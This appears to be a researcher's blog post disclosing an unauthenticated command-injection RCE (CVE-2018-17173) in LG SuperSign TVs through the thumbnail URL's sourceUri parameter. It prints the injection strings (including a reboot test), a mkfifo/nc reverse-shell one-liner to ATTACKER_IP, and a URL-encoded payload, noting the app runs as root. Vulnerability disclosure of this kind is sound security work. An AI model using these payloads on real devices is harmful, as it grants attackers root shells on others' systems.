miércoles, 19 de septiembre de 2018

LG SuperSign RCE! (to the 'luna' and back to shell)

Publishing the previous vulnerabilities in LG SuperSign TVs left me a bad taste in my mouth. Something like "I know that there must be something more".  So, I continued with my research and finally found the precious RCE.

This vulnerability has been addressed with the following CVE-2018-17173

The vuln

Playing with the app through burp I saw a url with some parameters. These URL is requested when the application needs to load the thumbnails of the images the user has uploaded.

So, I started to fuzz these parameters with ZAP until I found something interesting:

The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the values "' or 1 --'". It looked like it was triggering a command that was calling this utility but failling due to an unexpected parameter. Cleaning a little bit the input I found that with the value ' -' it was enough to receive this response. I knew I was close.

If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc, etc. After some failed attemps I tried with ' -;reboot;' and I saw how the TV was rebooting...the RCE was knocking on my door.

Getting a Shell

Taking advantage of the LFI, I knew that the TV had a netcat but was the netcat version  that doesn't support the -e option (downloading the binary), so I used the alternative:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

Encoded all to be passed in the URL


So, the payload was ready:

' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i

Putting it all together:


I launched netcat to catch the shell, made the request and...


I was in.

In a few days I'll be updating this post with more technical details. 
That is all for now.

Points to take into account:

-No need to be authenticated
-No need to privilege escalation (app is running as root)